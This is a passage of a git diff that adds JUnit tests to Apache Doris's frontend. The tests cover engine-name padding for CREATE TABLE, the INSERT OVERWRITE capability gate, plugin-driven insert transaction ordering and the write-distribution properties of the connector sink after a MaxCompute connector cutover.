+ */ +public class CreateTableInfoEngineCatalogTest { + + // Mirror of CreateTableInfo.ENGINE_MAXCOMPUTE (private constant). + private static final String ENGINE_MAXCOMPUTE = "maxcompute"; + + private MockedStatic mockedEnv; + private CatalogMgr catalogMgr; + + @BeforeEach + public void setUp() { + Env mockEnv = Mockito.mock(Env.class); + catalogMgr = Mockito.mock(CatalogMgr.class); + Mockito.when(mockEnv.getCatalogMgr()).thenReturn(catalogMgr); + mockedEnv = Mockito.mockStatic(Env.class); + mockedEnv.when(Env::getCurrentEnv).thenReturn(mockEnv); + } + + @AfterEach + public void tearDown() { + if (mockedEnv != null) { + mockedEnv.close(); + } + } + + /** Registers a PluginDriven catalog of the given connector type under the given name. */ + private void registerPluginCatalog(String ctlName, String type) { + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.doReturn(type).when(catalog).getType(); + Mockito.when(catalogMgr.getCatalog(ctlName)).thenReturn(catalog); + } + + private static CreateTableInfo newInfo(String ctlName, String engineName) { + return new CreateTableInfo(false, false, false, ctlName, "db", "tbl", + new ArrayList<>(), new ArrayList<>(), engineName, null, + new ArrayList<>(), null, null, null, + new ArrayList<>(), new HashMap<>(), new HashMap<>(), new ArrayList<>()); + } + + private static void invokePadding(CreateTableInfo info, String ctlName) throws Throwable { + Method m = CreateTableInfo.class.getDeclaredMethod("paddingEngineName", String.class, ConnectContext.class); + m.setAccessible(true); + try { + m.invoke(info, ctlName, null); + } catch (InvocationTargetException e) { + throw e.getCause(); + } + } + + private static void invokeCheck(CreateTableInfo info) throws Throwable { + Method m = CreateTableInfo.class.getDeclaredMethod("checkEngineWithCatalog"); + m.setAccessible(true); + try { + m.invoke(info); + } catch (InvocationTargetException e) { + throw e.getCause(); + } + } + + @Test + public void noEnginePaddedToMaxcomputeForPluginDriven() throws Throwable { + registerPluginCatalog("mc_ctl", "max_compute"); + CreateTableInfo info = newInfo("mc_ctl", null); + + invokePadding(info, "mc_ctl"); + + // Why: a no-ENGINE CREATE TABLE under a cutover max_compute catalog must auto-pad the + // legacy engine name, exactly as legacy MaxComputeExternalCatalog did, instead of throwing + // "Current catalog does not support create table". + Assertions.assertEquals(ENGINE_MAXCOMPUTE, info.getEngineName(), + "no-ENGINE CREATE TABLE on a PluginDriven max_compute catalog must pad engine=maxcompute"); + } + + @Test + public void ctasNoEnginePaddedToMaxcompute() { + registerPluginCatalog("mc_ctl", "max_compute"); + CreateTableInfo info = newInfo("mc_ctl", null); + + // CTAS routes through validateCreateTableAsSelect, whose first action is paddingEngineName. + // The downstream validate(ctx) is heavy and not exercised here; we assert only the padding + // side effect (set before validate runs). Pre-fix, paddingEngineName throws "does not support + // create table" before setting engineName, so getEngineName() would not be maxcompute. + try { + info.validateCreateTableAsSelect(Lists.newArrayList("mc_ctl"), new ArrayList<>(), + Mockito.mock(ConnectContext.class)); + } catch (Exception ignored) { + // Only the engine-padding side effect is under test here. + } + + Assertions.assertEquals(ENGINE_MAXCOMPUTE, info.getEngineName(), + "CTAS into a PluginDriven max_compute catalog must pad engine=maxcompute via " + + "validateCreateTableAsSelect"); + } + + @Test + public void wrongExplicitEngineRejectedForPluginDriven() { + registerPluginCatalog("mc_ctl", "max_compute"); + CreateTableInfo info = newInfo("mc_ctl", "hive"); + + // Why: the catalog-engine consistency check must still reject a mismatched explicit ENGINE + // under PluginDriven (legacy MaxComputeExternalCatalog rejected ENGINE != maxcompute). This + // fails with no exception if the checkEngineWithCatalog PluginDriven branch is absent. + Assertions.assertThrows(AnalysisException.class, () -> invokeCheck(info), + "explicit ENGINE=hive on a PluginDriven max_compute catalog must be rejected"); + } + + @Test + public void correctExplicitEnginePassesForPluginDriven() { + registerPluginCatalog("mc_ctl", "max_compute"); + CreateTableInfo info = newInfo("mc_ctl", ENGINE_MAXCOMPUTE); + + Assertions.assertDoesNotThrow(() -> invokeCheck(info), + "explicit ENGINE=maxcompute on a PluginDriven max_compute catalog must pass the check"); + } + + @Test + public void jdbcPluginDrivenStillUnsupported() { + registerPluginCatalog("jdbc_ctl", "jdbc"); + + // paddingEngineName: jdbc (helper returns null) falls through to the existing else-throw, + // byte-identical to legacy behavior for an SPI type that does not support CREATE TABLE. + CreateTableInfo padInfo = newInfo("jdbc_ctl", null); + AnalysisException ex = Assertions.assertThrows(AnalysisException.class, + () -> invokePadding(padInfo, "jdbc_ctl"), + "no-ENGINE CREATE TABLE on a jdbc PluginDriven catalog must still be unsupported"); + Assertions.assertTrue(ex.getMessage() != null && ex.getMessage().contains("does not support create table"), + "jdbc PluginDriven catalog must reuse the existing 'does not support create table' message"); + + // checkEngineWithCatalog: jdbc (helper returns null) must NOT throw — legacy lets jdbc/es/trino + // pass the consistency check unconditionally (they are not in the legacy instanceof chain). + CreateTableInfo checkInfo = newInfo("jdbc_ctl", "jdbc"); + Assertions.assertDoesNotThrow(() -> invokeCheck(checkInfo), + "jdbc PluginDriven catalog must pass checkEngineWithCatalog (legacy pass-through parity)"); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommandTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommandTest.java new file mode 100644 index 00000000000000..a1b83230e27f70 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommandTest.java @@ -0,0 +1,109 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.trees.plans.commands.insert; + +import org.apache.doris.catalog.TableIf; +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.nereids.trees.plans.logical.LogicalPlan; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Optional; + +/** + * Tests for {@link InsertOverwriteTableCommand}'s {@code allowInsertOverwrite} type gate + * (FIX-OVERWRITE-GATE). + * + *

Why this matters: after the MaxCompute SPI cutover, a MaxCompute table is a + * {@link PluginDrivenExternalTable} (TableType.PLUGIN_EXTERNAL_TABLE), no longer a + * {@code MaxComputeExternalTable}. The pre-fix gate only allow-listed + * OlapTable/RemoteDoris/HMS/Iceberg/MaxCompute, so {@code run()} rejected the whole command before the + * (already-wired) lower OVERWRITE machinery could run. The fix adds a {@code PluginDrivenExternalTable} + * arm, but gated on the connector's {@code supportsInsertOverwrite()} capability: all SPI + * connectors (jdbc/es/trino/max_compute) are {@code PluginDrivenExternalTable}, but only some honor + * overwrite. A bare {@code instanceof} would admit jdbc (which silently degrades OVERWRITE to a plain + * INSERT) — so the capability gate is the regression guard. These tests lock all three behaviors: + * overwrite-capable plugin table allowed, non-overwrite-capable plugin table rejected, and unsupported + * table types still rejected.

+ */ +public class InsertOverwriteTableCommandTest { + + private static InsertOverwriteTableCommand newCommand() { + // allowInsertOverwrite is field-independent; a minimal command (mock query plan) suffices. + return new InsertOverwriteTableCommand( + Mockito.mock(LogicalPlan.class), Optional.empty(), Optional.empty(), Optional.empty()); + } + + /** + * A PluginDrivenExternalTable whose connector reports {@code supportsInsertOverwrite()==supported}, + * stubbing the exact catalog -> connector -> metadata chain the production gate walks. + */ + private static PluginDrivenExternalTable pluginTable(boolean supported) { + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Connector connector = Mockito.mock(Connector.class); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + Mockito.when(table.getCatalog()).thenReturn(catalog); + Mockito.when(catalog.buildConnectorSession()).thenReturn(session); + Mockito.when(catalog.getConnector()).thenReturn(connector); + Mockito.when(connector.getMetadata(session)).thenReturn(metadata); + Mockito.when(metadata.supportsInsertOverwrite()).thenReturn(supported); + return table; + } + + @Test + public void testAllowInsertOverwriteForOverwriteCapablePluginDrivenTable() { + // An overwrite-capable connector (e.g. MaxCompute) MUST pass the gate, otherwise INSERT + // OVERWRITE throws before reaching the connector sink machinery. + // Mutation guard: removing the production PluginDrivenExternalTable arm makes this fall + // through to false -> assertion red. + boolean allowed = Deencapsulation.invoke(newCommand(), "allowInsertOverwrite", pluginTable(true)); + Assertions.assertTrue(allowed, + "an overwrite-capable plugin-driven table (e.g. MaxCompute) must be allowed for INSERT OVERWRITE"); + } + + @Test + public void testDisallowInsertOverwriteForNonOverwriteCapablePluginDrivenTable() { + // A plugin-driven table whose connector does NOT support overwrite (e.g. jdbc) MUST be + // rejected at the gate (fail loud), NOT admitted to silently degrade OVERWRITE to a plain + // INSERT. This is the regression guard. + // Mutation guard: dropping the `&& supportsInsertOverwrite(...)` from the production gate + // makes this return true -> assertion red. + boolean allowed = Deencapsulation.invoke(newCommand(), "allowInsertOverwrite", pluginTable(false)); + Assertions.assertFalse(allowed, + "a plugin-driven table whose connector does not support overwrite must be rejected, not silently degraded"); + } + + @Test + public void testDisallowInsertOverwriteForUnsupportedTableType() { + // A table type in none of the allow-listed arms must still be rejected, proving the fix + // added a specific arm rather than loosening the gate to admit everything. + boolean allowed = Deencapsulation.invoke(newCommand(), "allowInsertOverwrite", + Mockito.mock(TableIf.class)); + Assertions.assertFalse(allowed, + "an unsupported table type must NOT be allowed for INSERT OVERWRITE"); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutorTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutorTest.java new file mode 100644 index 00000000000000..92c1762da37a5e --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutorTest.java @@ -0,0 +1,254 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.trees.plans.commands.insert; + +import org.apache.doris.catalog.Env; +import org.apache.doris.common.UserException; +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.connector.ConnectorSessionBuilder; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorWriteOps; +import org.apache.doris.connector.api.handle.ConnectorInsertHandle; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorTransaction; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; +import org.apache.doris.connector.api.write.ConnectorSinkPlan; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; +import org.apache.doris.planner.PluginDrivenTableSink; +import org.apache.doris.thrift.TDataSink; +import org.apache.doris.transaction.PluginDrivenTransactionManager; +import org.apache.doris.transaction.TransactionType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collection; +import java.util.Collections; +import java.util.Optional; + +/** + * Ordering / routing tests for {@link PluginDrivenInsertExecutor}'s SPI transaction-model + * path (P4-T06a W-c / gap G2). + * + *

The four overrides encode the cutover's critical write-lifecycle constraint + * (design §1.2): {@code beginTransaction} opens the connector transaction and registers + * it globally, then {@code finalizeSink} must bind that transaction onto the sink's + * session before {@code super.finalizeSink -> bindDataSink -> planWrite} runs — + * because {@code planWrite} reads {@code session.getCurrentTransaction()} and fails loud if + * it is absent. {@code beforeExec} must skip the JDBC handle-model path, and + * {@code transactionType} reports MAXCOMPUTE.

+ * + *

The 7-arg executor constructor builds a {@code Coordinator} via + * {@code EnvFactory.createCoordinator}, which cannot be stood up in a unit test, so the + * instance is created without invoking the constructor (Objenesis, via Mockito's + * CALLS_REAL_METHODS) and the collaborator fields are injected directly; the real override + * bodies then run against hand-written connector doubles. Only construction uses Mockito — + * every assertion exercises real production code.

+ */ +public class PluginDrivenInsertExecutorTest { + + @Test + public void beginTransactionOpensConnectorTxnRegistersGloballyAndStampsTxnId() { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + StubConnectorTransaction connectorTx = new StubConnectorTransaction(70001L); + // Pre-seed the lazy setup so ensureConnectorSetup() short-circuits (no real catalog). + Deencapsulation.setField(exec, "connectorSession", ConnectorSessionBuilder.create().build()); + Deencapsulation.setField(exec, "writeOps", new FakeTxnWriteOps(connectorTx)); + Deencapsulation.setField(exec, "transactionManager", new PluginDrivenTransactionManager()); + + exec.beginTransaction(); + + try { + Assertions.assertSame(connectorTx, Deencapsulation.getField(exec, "connectorTx"), + "beginTransaction must open the connector transaction via writeOps"); + Assertions.assertEquals(70001L, exec.getTxnId(), + "the engine txn id must be the connector transaction's own id"); + Assertions.assertNotNull( + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(70001L), + "the connector txn must be globally registered for the BE block-allocation / " + + "commit-data RPCs (W-d)"); + } finally { + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().removeTxnById(70001L); + } + } + + @Test + public void finalizeSinkBindsTransactionOntoSinkSessionBeforePlanWrite() { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + StubConnectorTransaction connectorTx = new StubConnectorTransaction(70010L); + Deencapsulation.setField(exec, "connectorTx", connectorTx); + Deencapsulation.setField(exec, "insertCtx", Optional.empty()); + + // The sink carries its own session (built at translate time); planWrite reads the txn off it. + ConnectorSession sinkSession = ConnectorSessionBuilder.create().build(); + RecordingWritePlanProvider provider = new RecordingWritePlanProvider(); + PluginDrivenTableSink sink = new PluginDrivenTableSink( + null, provider, sinkSession, new ConnectorTableHandle() { }, Collections.emptyList()); + + exec.finalizeSink(null, sink, null); + + Assertions.assertNotNull(provider.txnSeenAtPlanWrite, "planWrite must have been reached"); + Assertions.assertTrue(provider.txnSeenAtPlanWrite.isPresent(), + "the transaction must be bound onto the sink's session before planWrite runs, " + + "otherwise the maxcompute write plan fails loud"); + Assertions.assertSame(connectorTx, provider.txnSeenAtPlanWrite.get(), + "planWrite must observe exactly the transaction beginTransaction opened"); + } + + @Test + public void beforeExecSkipsHandleModelForTransactionModel() throws UserException { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + // connectorTx set, writeOps deliberately left null: the JDBC handle-model branch would + // dereference writeOps, so a clean return proves the transaction-model early-out is taken. + Deencapsulation.setField(exec, "connectorTx", new StubConnectorTransaction(70020L)); + + exec.beforeExec(); + } + + @Test + public void transactionTypeIsMaxComputeForTransactionModel() { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + Deencapsulation.setField(exec, "connectorTx", new StubConnectorTransaction(70030L)); + + Assertions.assertEquals(TransactionType.MAXCOMPUTE, exec.transactionType(), + "the transaction-model executor reports MAXCOMPUTE (profiling-only; sole adopter)"); + } + + @Test + public void doBeforeCommitBackfillsLoadedRowsFromConnectorTxnInTransactionModel() throws UserException { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + // Transaction model: connectorTx present, no insert handle. The BE sink reports the row count + // only through the connector transaction's commit-data, so doBeforeCommit must backfill + // loadedRows from it -- otherwise affected-rows is reported as 0 (WRITE-P1 regression, + // mirroring legacy MCInsertExecutor.doBeforeCommit's loadedRows = transaction.getUpdateCnt()). + Deencapsulation.setField(exec, "connectorTx", new StubConnectorTransaction(70040L, 42L)); + + exec.doBeforeCommit(); + + Long loadedRows = Deencapsulation.getField(exec, "loadedRows"); + Assertions.assertEquals(42L, loadedRows.longValue(), + "transaction-model doBeforeCommit must set loadedRows = connectorTx.getUpdateCnt()"); + } + + @Test + public void doBeforeCommitUsesHandleModelAndSkipsTxnBackfillWhenNoConnectorTxn() throws UserException { + PluginDrivenInsertExecutor exec = newUnconstructedExecutor(); + // JDBC / auto-commit handle model: connectorTx is null. doBeforeCommit must run the + // insert-handle finishInsert path, and must NOT touch loadedRows via the (null) connector + // transaction -- a missing connectorTx==null guard would NPE here. + RecordingHandleWriteOps writeOps = new RecordingHandleWriteOps(); + Deencapsulation.setField(exec, "writeOps", writeOps); + Deencapsulation.setField(exec, "insertHandle", new ConnectorInsertHandle() { }); + Deencapsulation.setField(exec, "connectorSession", ConnectorSessionBuilder.create().build()); + + exec.doBeforeCommit(); + + Assertions.assertTrue(writeOps.finishInsertCalled, + "handle-model doBeforeCommit must still call writeOps.finishInsert"); + Long loadedRows = Deencapsulation.getField(exec, "loadedRows"); + Assertions.assertEquals(0L, loadedRows.longValue(), + "with no connector transaction, loadedRows must not be backfilled (stays at default)"); + } + + /** + * Creates a {@link PluginDrivenInsertExecutor} without running its constructor. See the class + * javadoc: the constructor builds a Coordinator that needs a live planner/EnvFactory. + */ + private static PluginDrivenInsertExecutor newUnconstructedExecutor() { + return Mockito.mock(PluginDrivenInsertExecutor.class, Mockito.CALLS_REAL_METHODS); + } + + /** Write ops that route through the SPI transaction model and hand back a fixed transaction. */ + private static final class FakeTxnWriteOps implements ConnectorWriteOps { + private final ConnectorTransaction txn; + + private FakeTxnWriteOps(ConnectorTransaction txn) { + this.txn = txn; + } + + @Override + public boolean usesConnectorTransaction() { + return true; + } + + @Override + public ConnectorTransaction beginTransaction(ConnectorSession session) { + return txn; + } + } + + /** Captures the transaction visible on the session at the moment planWrite is invoked. */ + private static final class RecordingWritePlanProvider implements ConnectorWritePlanProvider { + private Optional txnSeenAtPlanWrite; + + @Override + public ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle) { + this.txnSeenAtPlanWrite = session.getCurrentTransaction(); + return new ConnectorSinkPlan(new TDataSink()); + } + } + + /** Minimal hand-written {@link ConnectorTransaction}; identity plus an affected-row count. */ + private static final class StubConnectorTransaction implements ConnectorTransaction { + private final long txnId; + private final long updateCnt; + + private StubConnectorTransaction(long txnId) { + this(txnId, 0L); + } + + private StubConnectorTransaction(long txnId, long updateCnt) { + this.txnId = txnId; + this.updateCnt = updateCnt; + } + + @Override + public long getTransactionId() { + return txnId; + } + + @Override + public long getUpdateCnt() { + return updateCnt; + } + + @Override + public void commit() { + } + + @Override + public void rollback() { + } + + @Override + public void close() { + } + } + + /** Handle-model write ops that record whether finishInsert was invoked. */ + private static final class RecordingHandleWriteOps implements ConnectorWriteOps { + private boolean finishInsertCalled; + + @Override + public void finishInsert(ConnectorSession session, ConnectorInsertHandle handle, + Collection fragments) { + finishInsertCalled = true; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSinkTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSinkTest.java new file mode 100644 index 00000000000000..2ea98984df68d2 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSinkTest.java @@ -0,0 +1,258 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.trees.plans.physical; + +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.PrimitiveType; +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.nereids.properties.DistributionSpecHiveTableSinkHashPartitioned; +import org.apache.doris.nereids.properties.MustLocalSortOrderSpec; +import org.apache.doris.nereids.properties.OrderKey; +import org.apache.doris.nereids.properties.PhysicalProperties; +import org.apache.doris.nereids.trees.expressions.Slot; +import org.apache.doris.nereids.trees.expressions.SlotReference; +import org.apache.doris.nereids.trees.plans.Plan; +import org.apache.doris.nereids.types.IntegerType; + +import com.google.common.collect.ImmutableList; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.List; + +/** + * Tests for {@link PhysicalConnectorTableSink#getRequirePhysicalProperties()} (FIX-WRITE-DISTRIBUTION, + * NG-2 / NG-4; revised by FIX-BIND-STATIC-PARTITION, P0-3). After the MaxCompute SPI cutover the generic + * connector sink replaces legacy {@code PhysicalMaxComputeTableSink}; this pins that it reproduces the + * legacy 3-branch distribution, gated by connector capabilities: + * + *
    + *
  • dynamic-partition write (a partition column present in {@code cols}) + connector + * declaring {@code SINK_REQUIRE_PARTITION_LOCAL_SORT} → hash-by-partition + mandatory local sort, + * so the MaxCompute Storage API streaming partition writer does not hit "writer has been + * closed" on un-grouped rows;
  • + *
  • non-partition / all-static write + {@code SUPPORTS_PARALLEL_WRITE} → + * {@code SINK_RANDOM_PARTITIONED} (parallel writers, NG-4 parity);
  • + *
  • capability-less connector (jdbc/es-like) → {@code GATHER} (single writer).
  • + *
+ * + *

Index by full schema, not {@code cols}: the bind layer projects the static/partial-static + * write's child to full-schema order (static partition columns filled), so the hash/sort keys are the + * child slots at the partition columns' full-schema positions. {@code cols} excludes the static + * partition columns, so a cols-position lookup would mislocate the dynamic column in the partial-static + * case — {@code partialStaticPartitionHashesByDynamicColumn} guards that.

+ */ +public class PhysicalConnectorTableSinkTest { + + private static final Column DATA = new Column("data", PrimitiveType.INT); + private static final Column PART = new Column("part", PrimitiveType.INT); + + /** + * Dynamic-partition write: the partition column 'part' is present in cols (its value comes from + * the query), so the sink must hash-distribute and locally sort by 'part'. cols == full schema + * here (no static partition), so full-schema and cols positions coincide. + */ + @Test + public void dynamicPartitionWriteRequiresHashAndLocalSort() { + SlotReference dataSlot = new SlotReference("data", IntegerType.INSTANCE); + SlotReference partSlot = new SlotReference("part", IntegerType.INSTANCE); + // cols == full schema == [data, part] (part is dynamic), child output aligned 1:1. + PhysicalConnectorTableSink sink = sink( + table(true, true, ImmutableList.of(PART), ImmutableList.of(DATA, PART)), + Arrays.asList(DATA, PART), + ImmutableList.of(dataSlot, partSlot)); + + PhysicalProperties props = sink.getRequirePhysicalProperties(); + + Assertions.assertTrue(props.getDistributionSpec() instanceof DistributionSpecHiveTableSinkHashPartitioned, + "dynamic-partition write must hash-distribute by partition columns"); + DistributionSpecHiveTableSinkHashPartitioned dist = + (DistributionSpecHiveTableSinkHashPartitioned) props.getDistributionSpec(); + // The hash key is the child slot at 'part's full-schema position (index 1). + Assertions.assertEquals(ImmutableList.of(partSlot.getExprId()), dist.getOutputColExprIds(), + "hash key must be the partition-column slot taken at its full-schema position"); + Assertions.assertTrue(props.getOrderSpec() instanceof MustLocalSortOrderSpec, + "dynamic-partition write must require a mandatory local sort to group partition rows"); + List orderKeys = props.getOrderSpec().getOrderKeys(); + Assertions.assertEquals(1, orderKeys.size(), "exactly one partition column to sort by"); + Assertions.assertEquals(partSlot, orderKeys.get(0).getExpr(), + "local sort must be on the partition column"); + } + + /** + * Pure-dynamic write with a REORDERED explicit column list ({@code INSERT INTO mc (part, data) + * SELECT vpart, vdata}, schema [data, part]): the bind layer projects the child to FULL-SCHEMA + * order regardless of the user column order, so child output = [dataSlot, partSlot] while cols = + * [part, data]. The partition column must be located by its full-schema position (1), not its cols + * position (0). Guards the FIX-BIND-STATIC-PARTITION indexing revision against the pure-dynamic + * reordered-list regression a cols-position lookup would cause (it would read child[0] = dataSlot). + */ + @Test + public void dynamicReorderedColumnListHashesByPartitionAtFullSchemaPosition() { + SlotReference dataSlot = new SlotReference("data", IntegerType.INSTANCE); + SlotReference partSlot = new SlotReference("part", IntegerType.INSTANCE); + PhysicalConnectorTableSink sink = sink( + table(true, true, ImmutableList.of(PART), ImmutableList.of(DATA, PART)), + Arrays.asList(PART, DATA), // cols reordered: part first + ImmutableList.of(dataSlot, partSlot)); // child in full-schema order [data, part] + + PhysicalProperties props = sink.getRequirePhysicalProperties(); + + Assertions.assertTrue(props.getDistributionSpec() instanceof DistributionSpecHiveTableSinkHashPartitioned, + "reordered-list dynamic write must still hash-distribute by the partition column"); + DistributionSpecHiveTableSinkHashPartitioned dist = + (DistributionSpecHiveTableSinkHashPartitioned) props.getDistributionSpec(); + // 'part' at full-schema index 1 -> child[1] = partSlot. A cols-position lookup ('part' at cols + // index 0) would read child[0] = dataSlot and shuffle by the wrong column. + Assertions.assertEquals(ImmutableList.of(partSlot.getExprId()), dist.getOutputColExprIds(), + "hash key must be the partition slot at its full-schema position, not its cols position"); + Assertions.assertEquals(partSlot, props.getOrderSpec().getOrderKeys().get(0).getExpr(), + "local sort must be on the partition column slot"); + } + + /** + * Partial-static write ({@code PARTITION(ds='x') SELECT id, val, region} — ds static, region + * dynamic): the bind layer projects the child to full schema with ds filled (NULL), so child + * output = [id, val, ds, region] while cols = [id, val, region] (ds excluded). The partition + * columns must be located by their FULL-SCHEMA positions (ds@2, region@3), not their cols + * positions — otherwise the dynamic 'region' would be mislocated and grouping would break, + * re-triggering "writer has been closed". This guards the FIX-BIND-STATIC-PARTITION revision of + * the indexing (a cols-position regression yields hash keys = [ds] only). + */ + @Test + public void partialStaticPartitionHashesByDynamicColumn() { + Column id = new Column("id", PrimitiveType.INT); + Column val = new Column("val", PrimitiveType.INT); + Column ds = new Column("ds", PrimitiveType.INT); + Column region = new Column("region", PrimitiveType.INT); + SlotReference idSlot = new SlotReference("id", IntegerType.INSTANCE); + SlotReference valSlot = new SlotReference("val", IntegerType.INSTANCE); + SlotReference dsSlot = new SlotReference("ds", IntegerType.INSTANCE); + SlotReference regionSlot = new SlotReference("region", IntegerType.INSTANCE); + + PhysicalConnectorTableSink sink = sink( + table(true, true, ImmutableList.of(ds, region), ImmutableList.of(id, val, ds, region)), + Arrays.asList(id, val, region), // cols excludes static ds + ImmutableList.of(idSlot, valSlot, dsSlot, regionSlot)); // child == full schema + + PhysicalProperties props = sink.getRequirePhysicalProperties(); + + Assertions.assertTrue(props.getDistributionSpec() instanceof DistributionSpecHiveTableSinkHashPartitioned, + "partial-static write must hash-distribute by partition columns"); + DistributionSpecHiveTableSinkHashPartitioned dist = + (DistributionSpecHiveTableSinkHashPartitioned) props.getDistributionSpec(); + // Both partition columns located by full-schema position: child[2]=dsSlot, child[3]=regionSlot. + // A cols-position regression (region at cols index 2) would read child[2]=dsSlot and drop + // regionSlot, yielding [dsSlot] — caught by this exact-list assertion. + Assertions.assertEquals(ImmutableList.of(dsSlot.getExprId(), regionSlot.getExprId()), + dist.getOutputColExprIds(), + "hash keys must be the partition-column slots at their full-schema positions"); + Assertions.assertTrue(props.getOrderSpec() instanceof MustLocalSortOrderSpec, + "partial-static write must require a mandatory local sort"); + List orderKeys = props.getOrderSpec().getOrderKeys(); + Assertions.assertEquals(2, orderKeys.size(), "sort by both partition columns in full-schema order"); + Assertions.assertEquals(dsSlot, orderKeys.get(0).getExpr()); + Assertions.assertEquals(regionSlot, orderKeys.get(1).getExpr()); + } + + /** + * All-static-partition write: every partition column is statically specified and therefore absent + * from cols, so no grouping/sort is needed — parallel writers (RANDOM), matching legacy branch-2. + * After FIX-BIND-STATIC-PARTITION the bind layer projects the no-column-list form's child to full + * schema ([data, part] with part filled), but the RANDOM branch never indexes the child, so the + * result is RANDOM regardless of the child shape. + */ + @Test + public void allStaticPartitionWriteUsesRandomPartitioned() { + SlotReference dataSlot = new SlotReference("data", IntegerType.INSTANCE); + SlotReference partSlot = new SlotReference("part", IntegerType.INSTANCE); + PhysicalConnectorTableSink sink = sink( + table(true, true, ImmutableList.of(PART), ImmutableList.of(DATA, PART)), + Arrays.asList(DATA), // cols excludes the static part + ImmutableList.of(dataSlot, partSlot)); // child == full schema (part filled) + + Assertions.assertSame(PhysicalProperties.SINK_RANDOM_PARTITIONED, sink.getRequirePhysicalProperties(), + "an all-static-partition write needs no sort/shuffle and uses parallel writers"); + } + + /** + * Non-partitioned write with a parallel-write connector → parallel writers (RANDOM), the NG-4 + * parity case (the bug degraded this to GATHER). + */ + @Test + public void nonPartitionedWriteUsesRandomWhenParallel() { + SlotReference dataSlot = new SlotReference("data", IntegerType.INSTANCE); + PhysicalConnectorTableSink sink = sink( + table(true, true, ImmutableList.of(), ImmutableList.of(DATA)), + Arrays.asList(DATA), + ImmutableList.of(dataSlot)); + + Assertions.assertSame(PhysicalProperties.SINK_RANDOM_PARTITIONED, sink.getRequirePhysicalProperties(), + "a non-partitioned write on a parallel-write connector must use parallel writers, not GATHER"); + } + + /** + * Capability-less connector (jdbc/es-like): no parallel-write, no partition-sort → GATHER. Guards + * that the change did not broaden parallel/sort behavior to connectors that did not opt in. + 